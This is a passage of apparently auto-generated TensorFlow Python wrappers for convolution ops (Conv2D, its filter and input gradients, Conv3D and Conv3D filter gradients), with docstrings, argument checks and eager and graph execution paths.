output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q] *
filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertices strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`.
A 4-D tensor. The dimension order is interpreted according to the value
of `data_format`, see below for details.
filter: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: A list of `ints`.
1-D tensor of length 4. The stride of the sliding window for each
dimension of `input`. The dimension order is determined by the value of
`data_format`, see below for details.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2D", name, input, filter, "strides", strides,
"use_cudnn_on_gpu", use_cudnn_on_gpu, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_eager_fallback(
input, filter, strides=strides, use_cudnn_on_gpu=use_cudnn_on_gpu,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2D", input=input, filter=filter, strides=strides,
padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2D = tf_export("raw_ops.Conv2D")(_ops.to_raw_op(conv2d))
def conv2d_eager_fallback(input, filter, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv2d_backprop_filter(input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, out_channels]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified with
format.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2DBackpropFilter", name, input, filter_sizes, out_backprop,
"strides", strides, "use_cudnn_on_gpu", use_cudnn_on_gpu, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_backprop_filter_eager_fallback(
input, filter_sizes, out_backprop, strides=strides,
use_cudnn_on_gpu=use_cudnn_on_gpu, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2DBackpropFilter", input=input, filter_sizes=filter_sizes,
out_backprop=out_backprop, strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2DBackpropFilter = tf_export("raw_ops.Conv2DBackpropFilter")(_ops.to_raw_op(conv2d_backprop_filter))
def conv2d_backprop_filter_eager_fallback(input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2DBackpropFilter", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv2d_backprop_input(input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`,
where `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`.
4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified with
format.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2DBackpropInput", name, input_sizes, filter, out_backprop,
"strides", strides, "use_cudnn_on_gpu", use_cudnn_on_gpu, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_backprop_input_eager_fallback(
input_sizes, filter, out_backprop, strides=strides,
use_cudnn_on_gpu=use_cudnn_on_gpu, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2DBackpropInput", input_sizes=input_sizes, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2DBackpropInput = tf_export("raw_ops.Conv2DBackpropInput")(_ops.to_raw_op(conv2d_backprop_input))
def conv2d_backprop_input_eager_fallback(input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, ])
(filter, out_backprop) = _inputs_T
input_sizes = _ops.convert_to_tensor(input_sizes, _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2DBackpropInput", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d(input, filter, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes a 3-D convolution given 5-D `input` and `filter` tensors.
In signal processing, cross-correlation is a measure of similarity of
two waveforms as a function of a time-lag applied to one of them. This
is also known as a sliding dot product or sliding inner-product.
Our Conv3D implements a form of cross-correlation.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, in_depth, in_height, in_width, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[filter_depth, filter_height, filter_width, in_channels,
out_channels]`. `in_channels` must match between `input` and `filter`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3D", name, input, filter, "strides", strides, "padding",
padding, "data_format", data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_eager_fallback(
input, filter, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3D", input=input, filter=filter, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3D = tf_export("raw_ops.Conv3D")(_ops.to_raw_op(conv3d))
def conv3d_eager_fallback(input, filter, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv3D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_filter(input, filter, out_backprop, strides, padding, dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropFilter", name, input, filter, out_backprop,
"strides", strides, "padding", padding, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_filter_eager_fallback(
input, filter, out_backprop, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropFilter", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropFilter = tf_export("raw_ops.Conv3DBackpropFilter")(_ops.to_raw_op(conv3d_backprop_filter))
def conv3d_backprop_filter_eager_fallback(input, filter, out_backprop, strides, padding, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding, "dilations",
dilations)
_result = _execute.execute(b"Conv3DBackpropFilter", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export(v1=['nn.conv3d_backprop_filter', 'nn.conv3d_backprop_filter_v2'])
@deprecated_endpoints('nn.conv3d_backprop_filter', 'nn.conv3d_backprop_filter_v2')
def conv3d_backprop_filter_v2(input, filter_sizes, out_backprop, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 5-D
`[filter_depth, filter_height, filter_width, in_channels, out_channels]`
tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropFilterV2", name, input, filter_sizes,
out_backprop, "strides", strides, "padding", padding, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_filter_v2_eager_fallback(
input, filter_sizes, out_backprop, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
